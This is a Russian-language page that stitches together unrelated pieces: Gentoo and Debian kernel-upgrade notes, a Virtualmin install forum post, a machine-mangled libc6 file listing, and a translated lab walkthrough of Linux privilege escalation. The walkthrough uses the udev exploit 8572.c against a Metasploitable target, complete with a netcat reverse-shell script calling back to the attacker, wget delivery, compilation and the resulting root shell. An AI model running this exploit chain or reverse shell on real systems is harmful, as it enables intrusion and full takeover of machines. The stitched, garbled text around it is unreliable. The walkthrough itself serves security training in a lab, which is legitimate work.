Разное

I686 debian: LinuxMint Debian Edition (MATE) by Lazarus i686 (1xDVD) скачать торрент

Заметки им.Ibice: Gentoo i686 и PAE

На днях при сборке Chromium столкнулся со странной проблемой: на моей машине с 9Гб оперативной памяти как-то не хватило 3Гб свободных ресурсов для быстрой сборки пакета. После проверки через free мои опасения подтвердились: моя система действительно работает только с третью оперативной памяти. Причина тому нашлась достаточно быстро: дело в том, что при начальной сборке Gentoo я выбрал носитель, который вообще у нас предназначался для VPS. Конечно же, на VPS с 1Гб оперативной памяти это замечательный вариант, но вот для рабочей машины, наверное, все-таки лучшим вариантом был бы x86_64. Так или иначе, новую установку делать было уже некогда, но я вспомнил Debian, где на i686 поддерживается и большее количество памяти, чем 3Гб.

Причиной тому в Debian’е использование PAE. Если кратко, то этот механизм позволяет использовать объемы памяти, свойственные 64-битным системам, на системе 32-битной. Включается PAE на Gentoo достаточно легко и никаких проблем после этого не наблюдается, однако придется пересобирать ядро. Прежде всего, давайте отметим те параметры ядра, которые нужно заменить:

CONFIG_X86_PAE=y

CONFIG_X86_32=y

CONFIG_HIGHMEM4G=n

CONFIG_HIGHMEM64G=y

Люди пишут также, что нужно установить в «n» и параметр «CONFIG_M686», однако у меня и без этого все отлично заработало. Есть два варианта изменить эти параметры и пересобрать с ними ядро Linux:
1. Выгрузка текущих параметров ядра в файл и его последующая корректировка,
2. Корректировка параметров непосредственно во время работы genkernel, запущенного с параметром «—menuconfig».

Для начала рассмотрим первый вариант.

1.1. Выгружаем параметры ядра в файл «/root/kernel.config»:

zcat /proc/config.gz > /root/kernel.config

1.2. Редактируем полученный файл в более привычном и удобном текстовом редакторе (можно и в графическом, но только чтобы не добавлялся BOM и не менялась кодировка):

nano /root/kernel.config

Обратите внимание, что некоторые параметры могут быть закомментированы и к ним в таком случае будет прибавлено «is not set» в конце строки. В таком случае убираем диез, а «is not set» меняем на «=y/=n». Кстати, параметры, которые должны иметь отрицательное значение все-таки тоже обязательно объявлять, так как отсутствие явного включения не означает того, что параметр при сборке будет отключен.
1.3. Сохраняем параметры и запускаем пересборку ядра:

genkernel --kernel-config=/root/kernel.config all

На данном этапе многие (посмотрите форумы и будете удивлены) теряются и используют вместо «—kernel-config» просто «—config». Объясняю: первый вариант передает сборщику параметры сборки ядра, второй же — параметры самого сборщика, которые нам менять не нужно. Когда мы передаем в параметре «—config» настройки ядра, genkernel просто падает, что некоторые воспринимают как баг, хотя это вовсе не так.
1.4. Не забываем после завершения работы genkernel обновить и зависимые от ядра модули:

emerge --ask @module-rebuild

Без этого после перезагрузки у вас может отвалиться видеокарта, звук или сеть.
1.5. Перезагружаем машину и если что-то пошло не так (у меня, к примеру, начинает мигать экран на этапе запуска X11 и авторизоваться не выходит в консоли) выбираем при загрузке в grub’е другие параметры, а затем «Recovery mode», после чего получаем доступ в полноценную консоль и исправляем допущенные ошибки.

Второй способ немного проще, но для того, чтобы им пользоваться, нужно хорошо ориентироваться в меню.

2.1. Выгружаем параметры ядра в файл «/usr/src/linux/.config»:

zcat /proc/config.gz > /usr/src/linux/.config

2.2. Вызываем genkernel с меню функций ядра:

genkernel --menuconfig all

2.3. По умолчанию подгружается наш «/usr/src/linux/.config». Ищем нужные параметры и меняем их значение (если не можете что-то найти, жмите на «/» и вводите название параметра без «CONFIG_». Напрямую вы никуда не попадете, но программа покажет вам схематически где нужно искать.
2.4. После редактирования настроек необходимо сохранить полученный файл, причем в качестве пути для сохранения необходимо указывать просто «.config». Если сохранить настройки куда-то в другое место, то пересборка не будет иметь смысла, так как произойдет с теми же параметрами, которые в вашем ядре итак есть.
2.5. По аналогии с первым способом пересобираем зависимые от ядра модули:

emerge --ask @module-rebuild

После перезагрузки выполняем «free» и любуемся на полностью доступный объем виртуальной памяти. Если после этого ничего не изменилось, посмотрите, с какими параметрами в настоящий момент собрано ядро и убедитесь в том, что настройки были изменены. Если все правильно, то обратите внимание на объем памяти при запуске компьютера. Если там столько же, сколько и в Linux’е, то смотреть нужно уже в аппаратную сторону: быть может, некоторые модули неисправны, а кроме этого некоторые материнские платы сами по себе пе поддерживают крупные объемы оперативной памяти (сверьтесь с руководством к вашей материнской плате).

Установка ядра 3.2 на Debian Squeeze

Разработчики Debian, а конкретно те, кто отвечает за проект backports, иной раз решили нас порадовать, выпустив ядро 3.2.0 в своем репозитарии. Итак, поехали.

Если в Ваш sources.list не добавлен репозитарий Backports – то самое время это сделать:

# echo “deb http://backports.debian.org/debian-backports squeeze-backports main” >> /etc/apt/sources.list

Обновляем кеш репозитариев. Для исключения разного рода проблем рекомендую перед установкой ядра проапгрейдить систему.

# aptitude update && aptitude -y upgrade

Ищем новое ядрышко, для того, что бы выбрать нужное под Вашу архитектуру:

# aptitude search linux-image-3

В нашем распоряжении:

linux-image-3.2.0-0.bpo.1-486
linux-image-3.2.0-0.bpo.1-686-pae
linux-image-3.2.0-0.bpo.1-686-pae-dbg
linux-image-3.2.0-0.bpo.1-amd64
linux-image-3.2.0-0.bpo.2-486
linux-image-3.2.0-0.bpo.2-686-pae
linux-image-3.2.0-0.bpo.2-686-pae-dbg
linux-image-3.2.0-0.bpo.2-amd64
linux-image-3.2.0-0.bpo.2-rt-686-pae
linux-image-3.2.0-0.bpo.2-rt-686-pae-dbg

Выбираем необходимое нам ядро, исходя из архитектуры вашего ПК выберите нужное Вам ядро. Мне подошло 3.2.0-0.bpo.2-686-pae. Приставка -pae означает платформу x86, но которая при этом поддерживает более 4 гб оперативной памяти. Устанавливаем ядро. Будьте внимательны с зависимостями!

# aptitude install linux-image-3.2.0-0.bpo.2-686-pae

Aptitude предупредит нас о том, что необходимо решить зависимости. Поскольку, пакеты initramfs-tools и linux-base старой версии, то их необходимо подтянуть из Backports. При первом запросе отказываемся от установки ядра со старыми версиями пакетов, нажав “n”

Следующие НОВЫЕ пакеты будут установлены: libc6-i686{a} linux-image-3.2.0-0.bpo.2-686-pae{b} 0 пакетов обновлено, 2 установлено новых, 0 пакетов отмечено для удаления, и 0 пакетов не обновлено. Необходимо получить 24,1 MB архивов. После распаковки 92,7 MB будет занято. Следующие пакеты имеют неудовлетворённые зависимости: linux-image-3.2.0-0.bpo.2-686-pae: Зависит: linux-base (>= 3~) но установлен 2.6.32-41squeeze2 Ломает: initramfs-tools (< 0.99~) но установлен 0.98.8 Следующие действия разрешат зависимости: Сохранить для следующих пакетов их текущие версии: 1) linux-image-3.2.0-0.bpo.2-686-pae [Не установлен]   Принять данное решение? [Y/n/q/?] n

Далее Aptitude предложит нам обновить эти два пакета непосредственно из Backports, с чем мы и соглашаемся:

Следующие действия разрешат зависимости: Обновить следующие пакеты: 1) initramfs-tools [0.98.8 (now, stable) -> 0.99~bpo60+1 (squeeze-backports)] 2) linux-base [2.6.32-41squeeze2 (now, stable) -> 3.4~bpo60+1 (squeeze-backports)]   Принять данное решение? [Y/n/q/?] Y

Ну, тут понятное дело, тоже соглашаемся.

Следующие НОВЫЕ пакеты будут установлены: libc6-i686{a} linux-image-3.2.0-0.bpo.2-686-pae Следующие пакеты будут обновлены: initramfs-tools linux-base 2 пакетов обновлено, 2 установлено новых, 0 пакетов отмечено для удаления, и 0 пакетов не обновлено. Необходимо получить 24,2 MB архивов. После распаковки 92,5 MB будет занято. Хотите продолжить? [Y/n/?] Y

Перезагружаемся, наслаждаемся новым ядром. Стоит учесть, что для нового ядра отсутствует nvidia-kernel, virtualbox и еще некоторые модули для ядра. Однако, если вы используете драйвера vesa, или хотите обновить ядрышко для сервера – то ничего страшного не произойдет. Если после установки возникли проблемы с видеодрайверами – удалите, а еще лучше переименуйте xorg.conf.

Удачи! 🙂

 

Обновление ядра Debian — Карманные записки Системного Инженера — LiveJournal

Теперь выполняем поиск доступных для установки пакетов, содержащих ядро Debian. Обратите внимание на листинг ниже. Вначале идут пакеты из stable репозитроия, затем backports с буквенным индексом bpo.

# apt-cache search linux-image

linux-headers-3.16.0-4-586 — Header files for Linux 3.16.0-4-586

linux-headers-3.16.0-4-686-pae — Header files for Linux 3.16.0-4-686-pae

linux-headers-3.16.0-4-amd64 — Header files for Linux 3.16.0-4-amd64

linux-image-3.16.0-4-586 — Linux 3.16 for older PCs

linux-image-3.16.0-4-686-pae — Linux 3.16 for modern PCs

linux-image-3.16.0-4-686-pae-dbg — Debugging symbols for Linux 3.16.0-4-686-pae

linux-image-3.16.0-4-amd64 — Linux 3.16 for 64-bit PCs

linux-image-3.16.0-4-amd64-dbg — Debugging symbols for Linux 3.16.0-4-amd64

linux-image-486 — Linux for older PCs (dummy package)

linux-image-586 — Linux for older PCs (meta-package)

linux-image-686-pae — Linux for modern PCs (meta-package)

linux-image-686-pae-dbg — Debugging symbols for Linux 686-pae configuration (meta-package)

linux-image-amd64 — Linux for 64-bit PCs (meta-package)

linux-image-amd64-dbg — Debugging symbols for Linux amd64 configuration (meta-package)

nvidia-kernel-3.16.0-4-586 — NVIDIA binary kernel module for Linux 3.16.0-4-586

nvidia-kernel-3.16.0-4-686-pae — NVIDIA binary kernel module for Linux 3.16.0-4-686-pae

nvidia-kernel-3.16.0-4-amd64 — NVIDIA binary kernel module for Linux 3.16.0-4-amd64

linux-headers-4.9.0-0.bpo.2-686 — Header files for Linux 4.9.0-0.bpo.2-686

linux-headers-4.9.0-0.bpo.2-686-pae — Header files for Linux 4.9.0-0.bpo.2-686-pae

linux-headers-4.9.0-0.bpo.2-amd64 — Header files for Linux 4.9.0-0.bpo.2-amd64

linux-headers-4.9.0-0.bpo.2-rt-686-pae — Header files for Linux 4.9.0-0.bpo.2-rt-686-pae

linux-headers-4.9.0-0.bpo.2-rt-amd64 — Header files for Linux 4.9.0-0.bpo.2-rt-amd64

linux-image-4.9.0-0.bpo.2-686-pae-dbg — Debugging symbols for Linux 4.9.0-0.bpo.2-686-pae

linux-image-4.9.0-0.bpo.2-686-pae-unsigned — Linux 4.9 for modern PCs

linux-image-4.9.0-0.bpo.2-686-unsigned — Linux 4.9 for older PCs

linux-image-4.9.0-0.bpo.2-amd64-dbg — Debugging symbols for Linux 4.9.0-0.bpo.2-amd64

linux-image-4.9.0-0.bpo.2-amd64-unsigned — Linux 4.9 for 64-bit PCs

linux-image-4.9.0-0.bpo.2-rt-686-pae-dbg — Debugging symbols for Linux 4.9.0-0.bpo.2-rt-686-pae

linux-image-4.9.0-0.bpo.2-rt-686-pae-unsigned — Linux 4.9 for modern PCs, PREEMPT_RT

linux-image-4.9.0-0.bpo.2-rt-amd64-dbg — Debugging symbols for Linux 4.9.0-0.bpo.2-rt-amd64

linux-image-4.9.0-0.bpo.2-rt-amd64-unsigned — Linux 4.9 for 64-bit PCs, PREEMPT_RT

linux-headers-4.6.0-1-grsec-686-pae — Header files for Linux 4.6.0-1-grsec-686-pae

linux-headers-4.9.0-2-grsec-686-pae — Header files for Linux 4.9.0-2-grsec-686-pae

linux-headers-4.9.0-2-grsec-amd64 — Header files for Linux 4.9.0-2-grsec-amd64

linux-image-4.6.0-1-grsec-686-pae — Linux 4.6 for modern PCs, Grsecurity protection

linux-image-4.9.0-2-grsec-686-pae — Linux 4.9 for modern PCs, Grsecurity protection

linux-image-4.9.0-2-grsec-amd64 — Linux 4.9 for 64-bit PCs, Grsecurity protection

linux-image-grsec-686-pae — Linux image meta-package, grsec featureset

linux-image-grsec-amd64 — Linux image meta-package, grsec featureset

linux-image-grsec-i386 — Linux image meta-package, grsec featureset (transition package)

linux-image-686 — Linux for older PCs (meta-package)

linux-image-rt-686-pae — Linux for modern PCs (meta-package), PREEMPT_RT

linux-image-rt-686-pae-dbg — Debugging symbols for Linux rt-686-pae configuration (meta-package)

linux-image-rt-amd64 — Linux for 64-bit PCs (meta-package), PREEMPT_RT

linux-image-rt-amd64-dbg — Debugging symbols for Linux rt-amd64 configuration (meta-package)

linux-image-4.9.0-0.bpo.2-686 — Linux 4.9 for older PCs (signed)

linux-image-4.9.0-0.bpo.2-686-pae — Linux 4.9 for modern PCs (signed)

linux-image-4.9.0-0.bpo.2-amd64 — Linux 4.9 for 64-bit PCs (signed)

linux-image-4.9.0-0.bpo.2-rt-686-pae — Linux 4.9 for modern PCs, PREEMPT_RT (signed)

linux-image-4.9.0-0.bpo.2-rt-amd64 — Linux 4.9 for 64-bit PCs, PREEMPT_RT (signed)

Т.к. у нас уже стоит самое свежее ядро из стабильной ветки, его установку делать мы не будем, иначе
apt-get install linux-image-3.16.0-4-amd64

Ставим свежее ядро из блэкпортов. В результате поиска нас интересуют эти строки

apt-get install -t jessie-backports linux-image-4.9.0-0.bpo.2-amd64
apt-get install -t jessie-backports linux-headers-4.9.0-0.bpo.2-amd64

После обновления ядра Debian необходимо перезагрузить систему. Чтобы проверить версию ядра и просмотреть лог ошибок выполните команды ниже:

Расширение локальных привилегий в Linux при помощи эксплоита для ядра

Расширение локальных привилегий в Linux при помощи эксплоита для ядра

Получение прав суперпользователя сродни Граалю для специалистов, занимающихся эксплуатацией уязвимостей в Linux.


Автор: drd_


Получение прав суперпользователя сродни Граалю для специалистов, занимающихся эксплуатацией уязвимостей в Linux. Так же как и системная учетная запись в Windows, в Linux аккаунт root дает полный административный доступ к операционной системе. Однако иногда даже при помощи эксплоита, который сработал успешно, мы получаем низкоуровневый шелл, и нужно нечто, позволяющее расширить полномочия, для получения доступа к более привилегированным аккаунтам и полного контроля над целевой системой.


Шаг 1: Сбор информации и поиск эксплоита


После того как получен низкоуровневый шелл в целевой системе, наша цель – расширение привилегий, права суперпользователя и полный доступ к системе.


В этой статье будет рассмотрено решение этой задачи при помощи эксплоита для ядра. Поскольку у нас уже есть шелл, воспользуемся командой uname –a для получения первоначальной информации о системе. Кроме того, команда lsb_release –a также может оказаться полезной для выяснения дистрибутива и сведений о релизе.

[*] Started reverse TCP handler on 172.16.1.100:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (36 bytes) to 172.16.1.102
[*] Command shell session 2 opened (172.16.1.100:4444 -> 172.16.1.102:49499) at 2018-07-16 13:55:15 -0500
 
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
lsb_release -a
No LSB modeuls are available.
Distributor ID: Ubuntu
Description:    Ubuntu 8.04
Release:        8.04
Codename:       hardy


Мы выяснили, что система работает на базе Ubuntu 8.04 с ядром 2.6.24, и теперь приступаем к поиску эксплоита. В Kali есть локальная версия сайта Exploit-DB, представляющая собой базу данных, которая содержит эксплоиты, код и публикации. Поиск по базе осуществляется прямо из терминала при помощи команды searchsploit:

root@nullbyte:~# searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23 | exploits/linux_x86/local/42276.c
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escala | exploits/linux/local/160.c
Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Es | exploits/linux/local/22362.c
Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Es | exploits/linux/local/22363.c
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Pr | exploits/linux/local/9844.py
Linux Kernel 2.4.32/2.6.0 - 'do_mremap()' Bound Checking Privilege E | exploits/linux/local/145.c
Linux Kernel 2.4.30/2.6.11.5 - Bluetooth 'bluez_sock_create' Local P | exploits/linux/local/25289.c
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local  | exploits/linux/local/19933.rb
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / REHL 4.8/5.3 / SuSE 10 SP | exploits/linux/local/9545.c
Linux Kernel 2.4.x/2.6.x - 'Bluez' BlueTooth Signed Buffer Index Pri | exploits/linux/local/926.c
Linux Kernel 2.4.x/2.6.x - 'uselib()' Local Privilege Escalation (3) | exploits/linux/local/895.c
Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Privilege E | exploits/linux/local/25288.c
Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Local Privilege | exploits/linux/local/9598.txt
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox | exploits/linux/local/9479.c
Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Esca | exploits/linux_x86-64/local/4460.c
Linux Kernel 2.4/2.6 - 'sock_sendpage()' Local Privilege Escalation  | exploits/linux/local/9641.txt
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local | exploits/linux/local/8478.sh
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9/04) UDEV < 1.4.1 - Local Pr | exploits/linux/local/8572.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Cor | exploits/linux_x86/local/9542.c
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1 | exploits/linux/local/33321.c
Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation | exploits/linux/local/40812.c


Поскольку мы ищем эксплоит для расширения привилегий, то используем ключевое слово privilege, а затем уточняем результаты поиска при помощи утилиты grep (флаг –i говорит о том, что не нужно учитывать регистр). Например, мы можем воспользоваться эксплоитом 8572.c, который эксплуатирует брешь в менеджере устройств UDEV и позволяет выполнять код через непроверенные сообщения в сокетах Netlink. Просто копируем путь к эксплоиту и при помощи команды locate выясняем полный путь:

root@nullbyte:~# locate linux/local/8572.c
/usr/share/exploitdb/exploits/linux/local/8572.c
root@nullbyte:~#


Как вы могли догадаться, эксплоит написан на С, однако мы не будем углубляться в дебри, а просто скомпилируем исходник. Хотя если вы знакомы с языком С, будет совсем не лишним ознакомиться с логикой работы эксплоита. Чтобы получить базовое представление о том, чем мы будем пользоваться, при помощи команды cat заглянем вовнутрь файла и посмотрим комментарии:

* cve-2009-1185.c
*
* udev < 1141 Local Privilege Escalation Exploit
* Jon Oberheide <[email protected]>
* http://jon.oberheide.org
*
* Информация:
*
*   http://cvemitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
*
*   udev до версии 1.4.1 не проверяет, приходит ли NETLINK-сообщение из      
*   пространства ядра, что позволяет локальным аккаунтам расширять
*   привилегии при помощи отсылки NETLINK-сообщения из пространства
*   пользователя 
*
* Примечание:
*
*   Этот эксплоит является альтернативной версией эксплоита от kcope,
*   использует правила 95-udev-late.rules и позволяет запускать произвольные
*   команды при удалении устройства. Более чистый и надежный код при условии,
*   что в вашем дистрибутиве есть вышеуказанный файл с правилами. 
*
*   Протестирован в Gentoo, Intrepid и Jaunty.
*
* Использование:
*
*   Необходимо передать PID, прикрепленный к сокетам netlink менеджера udevd
*   указан в /proc/net/netlink и обычно равен udevd PID минус 1), в
*   качестве аргумента argv[1].
*
*   Эксплоит запускает /tmp/run от имени суперпользователя, и вы можете 
*   передать в ту команду любую полезную нагрузку.
 


Шаг 2: Доставка эксплоита в целевую систему


Для начала эксплоит нужно скопировать на целевую машину. Самый простой способ решить эту задачу – настроить локальный веб-сервер (например, Apache), подключиться к этому серверу с целевой системы и загрузить файл. Однако вначале нужно выполнить подготовительную работу.


Во-первых, убедитесь, что сервер поднят и работает в Kali. В терминале запустите команду service apache2 restart. Затем нужно создать символическую ссылку между директорией, где хранится и эксплоит и папкой с файлами сервера, при помощи следующей команды:

ln -s /usr/share/exploitdb/exploits/linux/local/ /var/www/html/


Теперь наш эксплоит доступен для загрузки.


В целевой системе эксплоит будет запускаться из директории /tmp, и нам нужно вначале создать исполняемый файл. В Kali введите команду nano /var/www/html/run и добавьте следующие строки:

#! /bin/bash
nc 172.16.1.100 4321 -e /bin/bash


После запуска этого файла для подключения и организации шелла к системе, в которой работает Kali, через IP-адрес и порт 4321, будет использоваться Netcat. Нажмите Ctrl-X, затем Y и далее клавишу Enter для сохранения файла.


Теперь мы готовы к загрузке файлов на целевую машину. Используя полученный ранее низкоуровневый шелл, переходим в директорию /tmp, при помощи утилиты wget подключаемся к веб-серверу, на котором установлен Kali, и загружаем файлы все необходимые файлы.

cd /tmp
wget http://172.16.1.100/run
--15:18:31--  http://172.16.1.100/run
           => 'run'
Connecting to 172.16.1.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46
 
    OK                                                  100%  978.43 KB/s
 
15:18:31 (978.43 KB/s) - 'run' saved [46/46]
 
wget http://172.16.1.100/local/8752.c
--15:19:24--  http://172.16.1.100/local/8572.c
           => '8572.c'
Connecting to 172.16.1.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,876 (2.8K) [text/x-csrc]
 
    OK                                                  100%  100.46 MB/s
 
15:19:24 (100.46 MB/s) - '8572.c' saved [2876/2876]


Шаг 3: Компиляция и запуск эксплоита


Когда все файлы, необходимые для запуска эксплоита, оказались в целевой системе, остался последний шаг – компиляция исходника. Мы не будем погружаться в дебри программирования, но, если коротко – исполняемый файл должен быть собран из исходного текста. В нашем случае компиляция будет осуществляться при помощи GCC (GNU Compiler Collection; Набор компиляторов проекта GNU).


Для компиляции файла 8572.c используйте следующую команду (флаг –o задает имя конечного исполняемого файла):


gcc -o exploit 8572.c


Если в процессе компиляции не будет найден динамический линковщик, воспользуйтесь флагом –B для указания директории, где находится ld:

gcc -B /usr/bin -o exploit 8572.c


После компиляции при помощи команды ls проверяем, что исполняемый файл появился.

gcc -o exploit 8572.c
collect2: cannont find 'ld'
 
gcc -B /usr/bin -o exploit 8572.c
 
ls
4674.jsvc_up
8572.c
exploit
jVswA
mhbkk
run


В комментариях файла 8572.c говорилось, что нам нужно найти PID (идентификатор процесса) сокета Netlink, который обычно равен идентификатору процесса UDEVD минус 1. Запускаем команду cat /proc/net/netlink и ищем ненулевой идентификатор. Проверяем найденное значение при помощи команды ps aux | grep udev. Идентификатор процесса UDEVB должен быть на единицу больше.

cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem     Wmem    Dump     Locks
celb4800 0   0      00000000 0        0       00000000 2
cf87fa00 4   0      00000000 0        0       00000000 2
cd678000 7   0      00000000 0        0       00000000 2
cdc4bc00 9   0      00000000 0        0       00000000 2
cdc09c00 10  0      00000000 0        0       00000000 2
ce1bc400 15  0      00000000 0        0       00000000 2
cf8dee00 15  2459   00000000 0        0       00000000 2
cd394800 16  0      00000000 0        0       00000000 2
cd5f6200 18  0      00000000 0        0       00000000 2
ps aux | grep udev
root      2460  0.0  0.2   2216   648 ?       S<s  14:42  0:01 /sbinudevd --daemon


Затем нужно настроить слушатель на машине с Kali, с которым будет устанавливаться соединение после запуска скрипта run на целевой системе. На машине с Kali введите команду nc -lvp 4321, после чего начнут отслеживаться входящие подключения.


После настройки слушателя, можно приступать к запуску эксплоита. Вспоминаем, что нужно передать PID сокета Netlink в качестве аргумента, который в нашем случае равен 2459 (у вас это значение может отличаться). Выполняем следующую команду в непривилегированном шелле:

./exploit 2459


Через некоторое время должно появиться подключение к нашему слушателю, и мы сможем запускать разные команды, как, например, id и whoami для просмотра информации о пользователе. Далее становится понятно, что у нас появился доступ с правами суперпользователя, и мы можем выполнять любые операции в целевой системе.

root@nullbyte:~# nc -lvp 4321
listening on [any] 4321 ...
172.16.1.102: inverse host lookup failed: Unknown host
connect to [172.16.1.100] from (UNKNOWN) [172.16.1.102] 34418
id
uid=0(root) gid=0(root)
whoami
root

Установка на Debian i686 | Virtualmin

Хорошо,

После нескольких перестроек коробки, запуска установки и анализа ошибок при установке я обнаружил несколько проблем.

Я проделал следующий сложный / трудный способ, возможно, есть более простой способ, но я его не знаю.

Проблема с установкой заключалась в попытке установить поврежденный / устаревший Debian webmin, который несовместим с Virtualmin.

Я обошел это, отключив все источники в моем файле исходных кодов apt перед запуском сценария установки.

Для этого потребовалось сначала установить все зависимости из репозиториев debian. Это

apt-get install sasl2-bin libsasl2-modules-sql libsasl2-modules libsasl2-krb4-mit libapache2-svn apache2-common scponly libapache2-mod-fcgid clamav-testfiles clamav-docs clamav-freshclav-daemon clamav clamav clamats libcrypt-ssleay-perl proftpd-doc proftpd-common proftpd dovecot-pop3d dovecot-imapd dovecot-common php4 webalizer awstats php4-pgsql postgresql-client postgresql php4-riql mysql-common mysql-client-common mysql server-common mysql-common mysql-common mysql server-common mysql-common mysql server irb ruby ​​subversion mailman python iptables quota libdbd-mysql-perl libdbd-pg-perl libpg-perl procmail spamc spamassassin bind9 libio-pty-perl libmd5-perl

после завершения я прокомментировал все источники из моего файла исходных кодов apt и запустил

apt-get clean; apt-get update

Затем я запустил установку.sh, и у меня, кажется, есть полностью рабочая конфигурация webmin / virtualmin.

Я попробую запустить все это еще раз при новой установке, чтобы убедиться, что я ничего не пропустил.

Я изменил следующую строку (623) с
apt-get -y —purge remove webmin-base apache
на
apt-get -y —purge remove webmin apache

Не уверен, что это помогло.

Строка 651 вызвала у меня некоторые проблемы, так как она не работает, если нет необходимости устанавливать какие-либо зависимости, т.е. предыдущая установка не удалась.Возможно, стоит упомянуть об этом в сообщении об ошибке.

.

libc6_2.28-10_i386.deb Debian 10 Скачать

/etc/ld.so.conf.d/i386-linux-gnu.conf
/lib/ld-linux.so.2
/lib/i386-linux-gnu/ld-2.28.so
/lib/i386-linux-gnu/ld-linux.so.2
/lib/i386-linux-gnu/libBrokenLocale-2.28.so
/lib/i386-linux-gnu/libBrokenLocale.so.1
/lib/i386-linux-gnu/libSegFault.so
/ lib / i386-linux-gnu / libanl-2.28.so
/lib/i386-linux-gnu/libanl.so.1
/lib/i386-linux-gnu/libc-2.28.so
/lib/i386-linux-gnu/libc.so.6
/lib/i386-linux-gnu/libcrypt-2.28.so
/lib/i386-linux-gnu/libcrypt.so.1
/lib/i386-linux-gnu/libdl-2.28.so
/lib/i386-linux-gnu/libdl.so.2
/lib/i386-linux-gnu/libm-2.28.so
/ библиотека / i386-linux-gnu / libm.так.6
/lib/i386-linux-gnu/libmemusage.so
/lib/i386-linux-gnu/libnsl-2.28.so
/lib/i386-linux-gnu/libnsl.so.1
/lib/i386-linux-gnu/libnss_compat-2.28.so
/lib/i386-linux-gnu/libnss_compat.so.2
/lib/i386-linux-gnu/libnss_dns-2.28.so
/lib/i386-linux-gnu/libnss_dns.so.2
/ lib / i386-linux-gnu / libnss_files-2.28.so
/lib/i386-linux-gnu/libnss_files.so.2
/lib/i386-linux-gnu/libnss_hesiod-2.28.so
/lib/i386-linux-gnu/libnss_hesiod.so.2
/lib/i386-linux-gnu/libnss_nis-2.28.so
/lib/i386-linux-gnu/libnss_nis.so.2
/lib/i386-linux-gnu/libnss_nisplus-2.28.so
/lib/i386-linux-gnu/libnss_nisplus.so.2
/ lib / i386-linux-gnu / libpcprofile.так
/lib/i386-linux-gnu/libpthread-2.28.so
/lib/i386-linux-gnu/libpthread.so.0
/lib/i386-linux-gnu/libresolv-2.28.so
/lib/i386-linux-gnu/libresolv.so.2
/lib/i386-linux-gnu/librt-2.28.so
/lib/i386-linux-gnu/librt.so.1
/lib/i386-linux-gnu/libthread_db-1.0.so
/ lib / i386-linux-gnu / libthread_db.так.1
/lib/i386-linux-gnu/libutil-2.28.so
/lib/i386-linux-gnu/libutil.so.1
/usr/lib/i386-linux-gnu/audit/sotruss-lib.so
/usr/lib/i386-linux-gnu/gconv/ANSI_X3.110.so
/usr/lib/i386-linux-gnu/gconv/ARMSCII-8.so
/usr/lib/i386-linux-gnu/gconv/ASMO_449.so
/usr/lib/i386-linux-gnu/gconv/BIG5.so
/ usr / lib / i386-linux-gnu / gconv / BIG5HKSCS.так
/usr/lib/i386-linux-gnu/gconv/BRF.so
/usr/lib/i386-linux-gnu/gconv/CP10007.so
/usr/lib/i386-linux-gnu/gconv/CP1125.so
/usr/lib/i386-linux-gnu/gconv/CP1250.so
/usr/lib/i386-linux-gnu/gconv/CP1251.so
/usr/lib/i386-linux-gnu/gconv/CP1252.so
/usr/lib/i386-linux-gnu/gconv/CP1253.so
/ usr / lib / i386-linux-gnu / gconv / CP1254.так
/usr/lib/i386-linux-gnu/gconv/CP1255.so
/usr/lib/i386-linux-gnu/gconv/CP1256.so
/usr/lib/i386-linux-gnu/gconv/CP1257.so
/usr/lib/i386-linux-gnu/gconv/CP1258.so
/usr/lib/i386-linux-gnu/gconv/CP737.so
/usr/lib/i386-linux-gnu/gconv/CP770.so
/usr/lib/i386-linux-gnu/gconv/CP771.so
/ usr / lib / i386-linux-gnu / gconv / CP772.так
/usr/lib/i386-linux-gnu/gconv/CP773.so
/usr/lib/i386-linux-gnu/gconv/CP774.so
/usr/lib/i386-linux-gnu/gconv/CP775.so
/usr/lib/i386-linux-gnu/gconv/CP932.so
/usr/lib/i386-linux-gnu/gconv/CSN_369103.so
/usr/lib/i386-linux-gnu/gconv/CWI.so
/usr/lib/i386-linux-gnu/gconv/DEC-MCS.so
/ usr / lib / i386-linux-gnu / gconv / EBCDIC-AT-DE-A.так
/usr/lib/i386-linux-gnu/gconv/EBCDIC-AT-DE.so
/usr/lib/i386-linux-gnu/gconv/EBCDIC-CA-FR.so
/usr/lib/i386-linux-gnu/gconv/EBCDIC-DK-NO-A.so
/usr/lib/i386-linux-gnu/gconv/EBCDIC-DK-NO.so
/usr/lib/i386-linux-gnu/gconv/EBCDIC-ES-A.so
/usr/lib/i386-linux-gnu/gconv/EBCDIC-ES-S.so
/ usr / lib / i386-linux-gnu / gconv / EBCDIC-ES.так
/usr/lib/i386-linux-gnu/gconv/EBCDIC-FI-SE-A.so
/usr/lib/i386-linux-gnu/gconv/EBCDIC-FI-SE.so
/usr/lib/i386-linux-gnu/gconv/EBCDIC-FR.so
/usr/lib/i386-linux-gnu/gconv/EBCDIC-IS-FRISS.so
